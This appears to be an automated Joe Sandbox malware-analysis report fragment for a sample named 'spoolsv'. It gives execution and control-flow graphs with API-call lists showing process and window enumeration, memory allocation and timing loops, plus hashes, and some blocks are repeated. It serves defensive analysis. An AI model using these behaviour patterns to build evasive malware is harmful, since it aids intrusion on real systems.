                                                execution_graph 24613 4e741c 24625 4e7424 24613->24625 24614 4e77c8 24688 4254d0 11 API calls 24614->24688 24616 4e77e5 24689 425be0 SysFreeString 24616->24689 24618 4e77f5 24690 425be0 SysFreeString 24618->24690 24619 4e75ba 24656 471e9c 32 API calls 24619->24656 24621 4e7802 24691 426c24 13 API calls 24621->24691 24622 4e74bd 24680 471e9c 32 API calls 24622->24680 24625->24614 24625->24622 24630 4e7561 24625->24630 24626 4e7810 24627 4e75d5 24657 471e9c 32 API calls 24627->24657 24630->24619 24635 4e75a1 FindWindowW 24630->24635 24631 4e74d8 24633 4cf5c8 18 API calls 24631->24633 24632 4e75f0 24658 471e9c 32 API calls 24632->24658 24634 4e74e4 24633->24634 24634->24614 24638 4cf628 18 API calls 24634->24638 24635->24614 24637 4e75b3 24635->24637 24637->24614 24646 4e7506 24638->24646 24639 4e760c 24659 4cf5c8 24639->24659 24641 4e7556 CloseHandle 24641->24614 24642 4e7618 24643 4e76c8 EnumWindows 24642->24643 24664 4cf628 24642->24664 24654 4e76de 24643->24654 24646->24641 24648 4e7541 24646->24648 24681 471e9c 32 API calls 24646->24681 24682 4cf648 24646->24682 24647 4e76c2 CloseHandle 24647->24643 24648->24641 24651 4e763a 24651->24647 24653 4cf648 18 API calls 24651->24653 24669 471e9c 32 API calls 24651->24669 24670 425c04 24651->24670 24653->24651 24654->24614 24687 4e02c8 54 API calls 24654->24687 24656->24627 24657->24632 24658->24639 24692 4cf34c 24659->24692 24662 4cf5d7 CreateToolhelp32Snapshot 24662->24642 24663 4cf5e2 24663->24642 24665 4cf34c 17 API calls 24664->24665 24666 4cf633 24665->24666 24667 4cf637 Process32FirstW 24666->24667 24668 4cf642 24666->24668 24667->24651 24668->24651 24669->24651 24671 425bc8 24670->24671 24672 425c0c 24670->24672 24673 425bce SysFreeString 24671->24673 24674 425bdc 24671->24674 24672->24671 24675 425c17 SysReAllocStringLen 24672->24675 24673->24674 24674->24651 24676 425c27 24675->24676 24677 425b98 24675->24677 24676->24651 24678 4261f4 24677->24678 24679 4261de SysAllocStringLen 24677->24679 24678->24651 24679->24677 24679->24678 24680->24631 24681->24646 24683 4cf34c 17 API calls 24682->24683 24684 4cf653 24683->24684 24685 4cf657 Process32NextW 24684->24685 24686 4cf662 24684->24686 24685->24646 24686->24646 24687->24654 24688->24616 24689->24618 24690->24621 24691->24626 24693 4cf35b GetModuleHandleA 24692->24693 24695 4cf490 24692->24695 24694 4cf370 16 API calls 24693->24694 24693->24695 24694->24695 24695->24662 24695->24663 24696 564640 24697 56464d VirtualAlloc 24696->24697 24699 6d8a4b 24701 6d8a50 24699->24701 24704 564678 24701->24704 24706 564685 24704->24706 24705 564812 24706->24705 24707 5646f6 02DE3A35 02DE3A1C 24706->24707 24713 564735 24707->24713 24708 564718 02DE3A35 24709 564727 02DE398D 24708->24709 24708->24713 24709->24713 24710 564793 24715 4250a4 24710->24715 24711 564752 02DE3A1C 24711->24713 24712 564761 02DE3A1C 24712->24713 24713->24708 24713->24710 24713->24711 24713->24712 24716 4250ea 24715->24716 24717 425163 24716->24717 24718 425310 24716->24718 24729 425034 24717->24729 24721 425344 24718->24721 24724 425355 24718->24724 24735 425284 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 24721->24735 24723 42534e 24723->24724 24725 42539a FreeLibrary 24724->24725 24726 4253be 24724->24726 24725->24724 24727 4253c7 24726->24727 24728 4253cd ExitProcess 24726->24728 24727->24728 24730 425049 24729->24730 24731 42507f 24729->24731 24730->24731 24736 423a80 24730->24736 24742 426cc4 24730->24742 24746 427860 24730->24746 24731->24705 24735->24723 24737 423a88 24736->24737 24740 423aa0 24736->24740 24752 42342c 24737->24752 24738 423a90 24738->24740 24763 423bb4 11 API calls 24738->24763 24740->24730 24743 426cd4 GetModuleFileNameA 24742->24743 24744 426cf0 24742->24744 24828 426f58 GetModuleFileNameA RegOpenKeyExA 24743->24828 24744->24730 24747 4278a2 24746->24747 24748 427871 24746->24748 24747->24730 24748->24747 24847 426d0c 24748->24847 24753 423443 24752->24753 24754 42343e 24752->24754 24756 423470 RtlEnterCriticalSection 24753->24756 24757 42347a 24753->24757 24762 42344f 24753->24762 24764 422bd0 RtlInitializeCriticalSection 24754->24764 24756->24757 24757->24762 24771 4232e4 24757->24771 24760 4235c7 24760->24738 24761 4235bd RtlLeaveCriticalSection 24761->24760 24762->24738 24763->24740 24765 422bf5 RtlEnterCriticalSection 24764->24765 24766 422bff 24764->24766 24765->24766 24767 422c1d LocalAlloc 24766->24767 24768 422c37 24767->24768 24769 422c97 24768->24769 24770 422c8d RtlLeaveCriticalSection 24768->24770 24769->24753 24770->24769 24772 4232fb 24771->24772 24773 42333c 24772->24773 24776 423363 24772->24776 24777 42324c 24772->24777 24773->24776 24782 42307c 24773->24782 24776->24760 24776->24761 24786 422950 24777->24786 24779 42325c 24780 423269 24779->24780 24793 4231c0 9 API calls 24779->24793 24780->24772 24783 423117 24782->24783 24784 4230a1 24782->24784 24783->24784 24802 422fc0 24783->24802 24784->24776 24788 42296e 24786->24788 24789 42297c 24788->24789 24791 4229dc 24788->24791 24794 422630 24788->24794 24800 4224e4 LocalAlloc 24788->24800 24789->24779 24801 42270c VirtualFree 24791->24801 24793->24780 24795 42263f 24794->24795 24796 42268f 24795->24796 24797 422454 LocalAlloc 24795->24797 24796->24788 24798 422678 24797->24798 24798->24796 24799 42267c VirtualFree 24798->24799 24799->24796 24800->24788 24801->24789 24803 422fd4 24802->24803 24804 423022 24803->24804 24805 42300c 24803->24805 24814 423070 24803->24814 24806 422b3c 3 API calls 24804->24806 24815 422b3c 24805->24815 24808 423020 24806->24808 24808->24814 24825 422e80 9 API calls 24808->24825 24810 423043 24811 423065 24810->24811 24826 422ee0 9 API calls 24810->24826 24827 42256c LocalAlloc 24811->24827 24814->24784 24816 422b66 24815->24816 24824 422bc3 24815->24824 24817 422894 VirtualFree 24816->24817 24818 422b77 24817->24818 24819 4224e4 LocalAlloc 24818->24819 24820 422b87 24819->24820 24821 42270c VirtualFree 24820->24821 24822 422b9e 24820->24822 24821->24822 24823 42256c LocalAlloc 24822->24823 24822->24824 24823->24824 24824->24808 24825->24810 24826->24811 24827->24814 24829 426fda 24828->24829 24830 426f9a RegOpenKeyExA 24828->24830 24846 426d80 12 API calls 24829->24846 24830->24829 24831 426fb8 RegOpenKeyExA 24830->24831 24831->24829 24833 427063 lstrcpyn GetThreadLocale GetLocaleInfoA 24831->24833 24835 427193 24833->24835 24836 42709a 24833->24836 24834 426fff RegQueryValueExA 24837 42703d RegCloseKey 24834->24837 24838 42701f RegQueryValueExA 24834->24838 24835->24744 24836->24835 24839 4270aa lstrlen 24836->24839 24837->24744 24838->24837 24841 4270c3 24839->24841 24841->24835 24842 4270f1 lstrcpyn LoadLibraryExA 24841->24842 24843 42711d 24841->24843 24842->24843 24843->24835 24844 427127 lstrcpyn LoadLibraryExA 24843->24844 24844->24835 24845 42715d lstrcpyn LoadLibraryExA 24844->24845 24845->24835 24846->24834 24848 426d20 24847->24848 24849 426d3c LoadStringA 24847->24849 24848->24849 24850 426cc4 30 API calls 24848->24850 24851 42559c 24849->24851 24850->24849 24856 425570 23 API calls 24851->24856 24853 4255ac 24857 4254ac 11 API calls 24853->24857 24855 4255c4 24855->24747 24856->24853 24857->24855 24858 42545e 24859 423a80 23 API calls 24858->24859 24860 425476 CreateThread 24859->24860 24861 425428 24860->24861 24862 425430 24861->24862 24865 423ab0 24862->24865 24866 423ab5 24865->24866 24868 423ac8 24865->24868 24866->24868 24869 423bb4 11 API calls 24866->24869 24869->24868 24870 425cbc 24871 425cc4 SysAllocStringLen 24870->24871 24872 425bc8 24870->24872 24875 425cd4 SysFreeString 24871->24875 24876 425b98 24871->24876 24873 425bce SysFreeString 24872->24873 24874 425bdc 24872->24874 24873->24874 24877 4261f4 24876->24877 24878 4261de SysAllocStringLen 24876->24878 24878->24876 24878->24877 24879 4fd3a0 GetTickCount 24880 4fd3b4 Sleep 24879->24880 24881 4fd3c3 24880->24881 24881->24880 24882 4fd3de GetTickCount 24881->24882 24883 4fd402 24882->24883 24883->24881

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1759228003-2375825460
                                                • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1759228003-2375825460
                                                • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                APIs
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1599918012-2375825460
                                                • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                APIs
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1599918012-2375825460
                                                • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 91 4fd43e-4fd448 call 4fd214 87->91 92 4fd44a-4fd44c 87->92 89 4fd437 88->89 90 4fd3d1-4fd3dc 88->90 89->87 90->89 93 4fd3de-4fd400 GetTickCount 90->93 91->92 92->86 95 4fd414-4fd420 93->95 96 4fd402-4fd412 93->96 95->89 98 4fd422-4fd432 call 4fdb20 95->98 96->95 98->89
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTick$Sleep
                                                • String ID: d5R$2R
                                                • API String ID: 4250438611-1222254985
                                                • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 91 4fd43e-4fd448 call 4fd214 87->91 92 4fd44a-4fd44c 87->92 89 4fd437 88->89 90 4fd3d1-4fd3dc 88->90 89->87 90->89 93 4fd3de-4fd400 GetTickCount 90->93 91->92 92->86 95 4fd414-4fd420 93->95 96 4fd402-4fd412 93->96 95->89 98 4fd422-4fd432 call 4fdb20 95->98 96->95 98->89
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTick$Sleep
                                                • String ID: d5R$2R
                                                • API String ID: 4250438611-1222254985
                                                • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 40 564678-564683 41 564685-564689 40->41 42 564699-5646a8 40->42 43 564812-564816 41->43 44 56468f-564693 41->44 45 5646f1-5646f4 42->45 46 56482e-564833 43->46 47 564818-56481c 43->47 44->42 44->43 48 5646f6-564716 02DE3A35 02DE3A1C 45->48 49 5646aa-5646b0 45->49 47->46 52 56481e-56482b 47->52 53 56478c-564791 48->53 50 5646b2-5646ba 49->50 51 5646ec-5646ef 49->51 50->51 54 5646bc-5646bd 50->54 51->45 52->46 55 564793-5647aa 53->55 56 564718-564725 02DE3A35 53->56 57 5646bf-5646cd 54->57 60 5647ac-5647af 55->60 61 5647cb-5647d2 55->61 58 564727-564733 02DE398D 56->58 59 564735-564737 56->59 64 5646cf-5646e6 57->64 65 5646e8-5646ea 57->65 58->59 66 564789 59->66 67 564739-56473d 59->67 60->61 68 5647b1 60->68 62 5647d4-5647d7 61->62 63 5647ea-564810 call 4250a4 61->63 62->63 72 5647d9 62->72 63->43 64->65 65->51 65->57 66->53 69 564743 67->69 70 56473f-564741 67->70 71 5647b2-5647c9 68->71 73 564746-564749 69->73 70->73 71->61 71->71 74 5647da-5647e8 72->74 76 564783-564787 73->76 74->63 74->74 76->66 77 56474b-564750 76->77 78 564752-56475f 02DE3A1C 77->78 79 564761-564768 02DE3A1C 77->79 80 56476d-564773 78->80 79->80 81 564775-56477c 